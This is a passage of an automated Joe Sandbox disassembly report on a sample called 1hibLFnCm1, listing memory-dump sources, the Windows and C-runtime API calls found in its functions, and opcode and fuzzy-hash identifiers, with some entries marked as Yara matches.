• Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: 2c85f6a5c218675a6b8526855494a9bfd2f92bba50d219a1f9182cf1bcc39230
                                                      • Instruction ID: 5f5ff953bcf44b2f2c873c17577b8612a2b7cd5610b66f7e6a79f2231a86b362
                                                      • Opcode Fuzzy Hash: 2c85f6a5c218675a6b8526855494a9bfd2f92bba50d219a1f9182cf1bcc39230
                                                      • Instruction Fuzzy Hash: 67F08932A016256BDF215B65DC05B6A376DAF437F0F15422ABC48E6191CF74D803B7E1

                                                      Control-flow Graph

                                                      control_flow_graph 460 f73905-f73929 CreateFileW
                                                      APIs
                                                      • CreateFileW.KERNELBASE(?,00000000,?,00F73CF5,?,?,00000000,?,00F73CF5,?,0000000C), ref: 00F73922
Memory Dump Source
• Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: 0ab32e978f13d75a8aaa86677d837e58c29efe3650e6c164c8094271ee3894b2
                                                      • Instruction ID: d6a36405210847362e28ef4efa1cda5c746a2491a87e50b70d6cd8ec1d36c989
                                                      • Opcode Fuzzy Hash: 0ab32e978f13d75a8aaa86677d837e58c29efe3650e6c164c8094271ee3894b2
                                                      • Instruction Fuzzy Hash: 64D06C3200010DBBDF028F84DC06EDA3BAAFB88714F114040FA1856020C772E871AB91
                                                      APIs
Memory Dump Source
• Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
Similarity
                                                      • API ID: __floor_pentium4
                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                      • API String ID: 4168288129-2761157908
                                                      • Opcode ID: f690dabc765175ab7a60752586344e40fd9ad6d8b5541cdf8cb879942bdc9d98
                                                      • Instruction ID: 2d8086fdc490cc077552dd3320f3c8769ae2c7a8c7ad6e02d4dcb3e0e14a1a31
                                                      • Opcode Fuzzy Hash: f690dabc765175ab7a60752586344e40fd9ad6d8b5541cdf8cb879942bdc9d98
                                                      • Instruction Fuzzy Hash: 4FD22872E086288FDB65CF28DD407EAB7B5EB44315F1485EAD40DE7240E778AE819F42
                                                      APIs
                                                      • GetLocaleInfoW.KERNEL32(3FC00000,2000000B,00F72C5F,00000002,00000000,?,?,?,00F72C5F,?,00000000), ref: 00F729DA
                                                      • GetLocaleInfoW.KERNEL32(3FC00000,20001004,00F72C5F,00000002,00000000,?,?,?,00F72C5F,?,00000000), ref: 00F72A03
                                                      • GetACP.KERNEL32(?,?,00F72C5F,?,00000000), ref: 00F72A18
Memory Dump Source
• Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
Similarity
                                                      • API ID: InfoLocale
                                                      • String ID: ACP$OCP
                                                      • API String ID: 2299586839-711371036
                                                      • Opcode ID: e462c49921bd2cb8a78996aabca0daefa2d4bf7c6433d48b8fb492740096edd8
                                                      • Instruction ID: 570ce10152c940a494f020f2a3cd74c045d35854a88fc24596a531730645cc42
                                                      • Opcode Fuzzy Hash: e462c49921bd2cb8a78996aabca0daefa2d4bf7c6433d48b8fb492740096edd8
                                                      • Instruction Fuzzy Hash: 0B219522E00105A7E7B48B64D900B97B2B6EB54B74F5AC426EA4DE7105E732DD40F752
                                                      APIs
                                                        • Part of subcall function 00F691E1: GetLastError.KERNEL32(?,00000008,00F67C1C), ref: 00F691E5
                                                        • Part of subcall function 00F691E1: SetLastError.KERNEL32(00000000,00000001,00000005,000000FF), ref: 00F69287
                                                      • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00F72C22
                                                      • IsValidCodePage.KERNEL32(00000000), ref: 00F72C6B
                                                      • IsValidLocale.KERNEL32(?,00000001), ref: 00F72C7A
                                                      • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00F72CC2
                                                      • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00F72CE1
Memory Dump Source
• Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
Similarity
                                                      • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                      • String ID:
                                                      • API String ID: 415426439-0
                                                      • Opcode ID: 04b09934004e879a19c82f6f33f643fdfc64818df0fa05becb72f27b541e45ab
                                                      • Instruction ID: fd0b27064c46668714e42b268c9674f998a34889dd3eafbf774ee014ff9a66b0
                                                      • Opcode Fuzzy Hash: 04b09934004e879a19c82f6f33f643fdfc64818df0fa05becb72f27b541e45ab
                                                      • Instruction Fuzzy Hash: 69519471E00209ABDB61DFA4CC41EBE73B8BF58320F55846AE918E7191D7749940EB63
                                                      APIs
                                                        • Part of subcall function 00F691E1: GetLastError.KERNEL32(?,00000008,00F67C1C), ref: 00F691E5
                                                        • Part of subcall function 00F691E1: SetLastError.KERNEL32(00000000,00000001,00000005,000000FF), ref: 00F69287
                                                      • GetACP.KERNEL32(?,?,?,?,?,?,00F65CC8,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00F72273
                                                      • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00F65CC8,?,?,?,00000055,?,-00000050,?,?), ref: 00F7229E
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00F72401
Memory Dump Source
• Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
Similarity
                                                      • API ID: ErrorLast$CodeInfoLocalePageValid
                                                      • String ID: utf8
                                                      • API String ID: 607553120-905460609
                                                      • Opcode ID: 44771d6aafbe5dbe1ba0b7ff559c0305acafb3fc37f3dd6e2a51bb9d9b376f26
                                                      • Instruction ID: 62b547e04f45d2bc08bbdc7682431e0fd61d451c3002fd0f58f28cc51d9b8542
                                                      • Opcode Fuzzy Hash: 44771d6aafbe5dbe1ba0b7ff559c0305acafb3fc37f3dd6e2a51bb9d9b376f26
                                                      • Instruction Fuzzy Hash: F0711771A00206AAEB64AF74CC46BAA73ACFF45310F10C42BF90DD7182EA78D941F752
                                                      APIs
Memory Dump Source
• Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
Similarity
                                                      • API ID: _strrchr
                                                      • String ID:
                                                      • API String ID: 3213747228-0
                                                      • Opcode ID: 252da8c2916a6ccd7a08688b1d0fc99207b249f10b85b28511e47a57bb66c47f
                                                      • Instruction ID: e559949af4ed6c373492fd83d670795de6e0e88ef39f6bee8fb4353cd435a369
                                                      • Opcode Fuzzy Hash: 252da8c2916a6ccd7a08688b1d0fc99207b249f10b85b28511e47a57bb66c47f
                                                      • Instruction Fuzzy Hash: B8B15932D082459FDF15CF68C881BFEBBE9EF45350F14816AE905AB241D2B9DD01EBA1
                                                      APIs
                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00F5B99D
                                                      • IsDebuggerPresent.KERNEL32 ref: 00F5BA69
                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00F5BA89
                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 00F5BA93
Memory Dump Source
• Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
Similarity
                                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                      • String ID:
                                                      • API String ID: 254469556-0
                                                      • Opcode ID: 304eb7ff29c29b2feb904779a2ecbb650c56f234b15e343be735041d7d14f5fc
                                                      • Instruction ID: 4767ead35a17b32364f9cf35a24eaacb23690d43500eea8e5702a7a0c5755d1a
                                                      • Opcode Fuzzy Hash: 304eb7ff29c29b2feb904779a2ecbb650c56f234b15e343be735041d7d14f5fc
                                                      • Instruction Fuzzy Hash: 8A313875D0521C9BDB20DFA4DD89BCCBBB8BF08301F1040AAE50DAB250EB749A89DF45
                                                      APIs
                                                        • Part of subcall function 00F691E1: GetLastError.KERNEL32(?,00000008,00F67C1C), ref: 00F691E5
                                                        • Part of subcall function 00F691E1: SetLastError.KERNEL32(00000000,00000001,00000005,000000FF), ref: 00F69287
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00F72619
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00F72663
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00F72729
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                       • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InfoLocale$ErrorLast
                                                      • String ID:
                                                      • API String ID: 661929714-0
                                                      • Opcode ID: 69440b8aae4bf9ec1ee0742950069987694233322a5fb3020ae0be7174185136
                                                      • Instruction ID: b0640a044f08f4092c744ef701fa1dbcf9ed4f31b3bfa55610334e2ad66fee3d
                                                      • Opcode Fuzzy Hash: 69440b8aae4bf9ec1ee0742950069987694233322a5fb3020ae0be7174185136
                                                      • Instruction Fuzzy Hash: A36194719001079BDB689F28CD82B7A77A8FF14310F10817BE919C6185E778DA82FB52
                                                      APIs
                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000001), ref: 00F61D2C
                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000001), ref: 00F61D36
                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000001), ref: 00F61D43
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                       • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                      • String ID:
                                                      • API String ID: 3906539128-0
                                                      • Opcode ID: a7279064115c6cd1ced1fcac61bb3970f06ec94293cf7780f80f08ab874fb325
                                                      • Instruction ID: 8d09670e7461e965f361ec58e0bc8a2c1d948dd7c689a78210463ca44d044917
                                                      • Opcode Fuzzy Hash: a7279064115c6cd1ced1fcac61bb3970f06ec94293cf7780f80f08ab874fb325
                                                      • Instruction Fuzzy Hash: 6A31C17490122CABCB21DF24DC88BCCBBB8BF48351F5041EAE90CA7290E7749B859F45
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                       • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 636ed376910306cad64807a91013b3093d4a624d03e1325861f7855058dad1ff
                                                      • Instruction ID: d72bc38370877da59cae7e46ff942b14e133af75434028065d6b7e943f3113df
                                                      • Opcode Fuzzy Hash: 636ed376910306cad64807a91013b3093d4a624d03e1325861f7855058dad1ff
                                                      • Instruction Fuzzy Hash: 46F12E71E002199FDF18CF68D880AADF7B1FF88324F158269E915AB391D731AE45DB90
                                                      APIs
                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,3FC00000,?,00000008,?,?,00F6D2B6,3FC00000,?,00000008,?,?,00F76D94,00000000), ref: 00F6D4E8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                       • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExceptionRaise
                                                      • String ID:
                                                      • API String ID: 3997070919-0
                                                      • Opcode ID: b610d7eecdbe4347fd6c72c602fe948daf7da2f64bde3d9cad63636a5f76977a
                                                      • Instruction ID: 942f509b162db22a58d0578e04d145d5f2e25e0de337ce720c4d8110d608bc17
                                                      • Opcode Fuzzy Hash: b610d7eecdbe4347fd6c72c602fe948daf7da2f64bde3d9cad63636a5f76977a
                                                      • Instruction Fuzzy Hash: 62B14C72A10609CFD719CF28C486B657BE0FF45368F298658E89ACF2A1C735ED81DB41
                                                      APIs
                                                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00F5B68B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                       • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FeaturePresentProcessor
                                                      • String ID:
                                                      • API String ID: 2325560087-0
                                                      • Opcode ID: 6ecbbec53bb26ecbddea6f1adef40bded1b984a2afbd0ff6e7793e5fa35c4573
                                                      • Instruction ID: 231349deec7b618058438f8801041c8de81f7edb9cd350a8e97f5a7747269528
                                                      • Opcode Fuzzy Hash: 6ecbbec53bb26ecbddea6f1adef40bded1b984a2afbd0ff6e7793e5fa35c4573
                                                      • Instruction Fuzzy Hash: FD516D71D156098FDB18CF58E8D57AEBBF4FB48326F28802AD901EB290D3759944DF50
                                                      APIs
                                                        • Part of subcall function 00F691E1: GetLastError.KERNEL32(?,00000008,00F67C1C), ref: 00F691E5
                                                        • Part of subcall function 00F691E1: SetLastError.KERNEL32(00000000,00000001,00000005,000000FF), ref: 00F69287
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00F7286C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                       • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$InfoLocale
                                                      • String ID:
                                                      • API String ID: 3736152602-0
                                                      • Opcode ID: f9554c9a162b7aa0cfe6439ae4f201797b3ce4f271cef93dde88d587cc0c9125
                                                      • Instruction ID: 3deef22f330a399e9b41fca266f1a2c01a196521b21e7f2639750dc47fd512e2
                                                      • Opcode Fuzzy Hash: f9554c9a162b7aa0cfe6439ae4f201797b3ce4f271cef93dde88d587cc0c9125
                                                      • Instruction Fuzzy Hash: 2F21C532A04106ABEB289B24DC41FBA73ACEF54320F10407BFD09D6145EB7ADD48EB52
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                       • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0
                                                      • API String ID: 0-4108050209
                                                      • Opcode ID: 363f142fb7806c48cbe288a349bf58cc079dfcfbe0e14001153e9d04412a9626
                                                      • Instruction ID: 7d4da6b4e9cdb219a17cac1cd58faf8741f0f3c7ec9a4f3827ba5fc56ec4f6db
                                                      • Opcode Fuzzy Hash: 363f142fb7806c48cbe288a349bf58cc079dfcfbe0e14001153e9d04412a9626
                                                      • Instruction Fuzzy Hash: 34B1F370D0065A9BCF34CE68C8A1ABFB7B5FF15324F280A1AE452D7291CB369941FB51
                                                      APIs
                                                        • Part of subcall function 00F691E1: GetLastError.KERNEL32(?,00000008,00F67C1C), ref: 00F691E5
                                                        • Part of subcall function 00F691E1: SetLastError.KERNEL32(00000000,00000001,00000005,000000FF), ref: 00F69287
                                                      • EnumSystemLocalesW.KERNEL32(00F725C5,00000001,00000000,?,-00000050,?,00F72BF6,00000000,?,?,?,00000055,?), ref: 00F72511
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                       • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                      • String ID:
                                                      • API String ID: 2417226690-0
                                                      • Opcode ID: 860b5f2e60c2cfa8cf2efdab68b110ec96a13a9b85bc7aba57af295822a9316e
                                                      • Instruction ID: 586aba6ef528cecc73076ceb04284315126bf20fa3ae540107f46db4f164e4f6
                                                      • Opcode Fuzzy Hash: 860b5f2e60c2cfa8cf2efdab68b110ec96a13a9b85bc7aba57af295822a9316e
                                                      • Instruction Fuzzy Hash: 22114C376007015FDB189F38CCA157ABB91FF84328B18842DE98B47640D775B943DB40
                                                      APIs
                                                        • Part of subcall function 00F691E1: GetLastError.KERNEL32(?,00000008,00F67C1C), ref: 00F691E5
                                                        • Part of subcall function 00F691E1: SetLastError.KERNEL32(00000000,00000001,00000005,000000FF), ref: 00F69287
                                                      • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00F727E1,00000000,00000000,?), ref: 00F72A73
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                       • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmp
